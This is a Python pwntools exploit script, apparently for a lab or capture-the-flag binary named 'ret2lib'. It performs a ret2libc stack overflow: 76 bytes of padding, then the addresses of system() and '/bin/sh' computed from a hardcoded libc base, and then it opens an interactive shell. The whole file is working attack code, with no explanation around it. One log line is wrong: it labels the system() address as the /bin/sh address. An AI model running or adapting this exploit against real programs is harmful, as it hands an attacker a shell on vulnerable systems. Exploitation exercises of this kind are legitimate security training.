#!/usr/bin/python

from pwn import *


libc_address = 0xf7d89000


def main():
    e = ELF('/lib/i386-linux-gnu/libc.so.6')

    log.info("libc base address: %#x" % libc_address)

    system_offset  = e.symbols['system']
    bin_sh_offset = next(e.search(b'/bin/sh\x00'))

    log.info("system() offset: %#x" % system_offset)
    log.info("/bin/sh offset: %#x" % bin_sh_offset)

    system_address = libc_address + system_offset
    bin_sh_address = libc_address + bin_sh_offset 
    log.info("system() address: %#x" % system_address)
    log.info("/bin/sh address: %#x" % system_address)
    # start the process
    p = process("./ret2lib")

    # print the pid
    raw_input(str(p.proc.pid))

    # craft the payload
    payload = b"A"*76
    payload += p32(system_address)
    payload += p32(0x41414141) # junk data, you can put exit() address here to let it exit gracefully
    payload += p32(bin_sh_address)



    # send the payload
    p.send(payload)

    # pass interaction to the user
    p.interactive()

if __name__ == "__main__":
    main()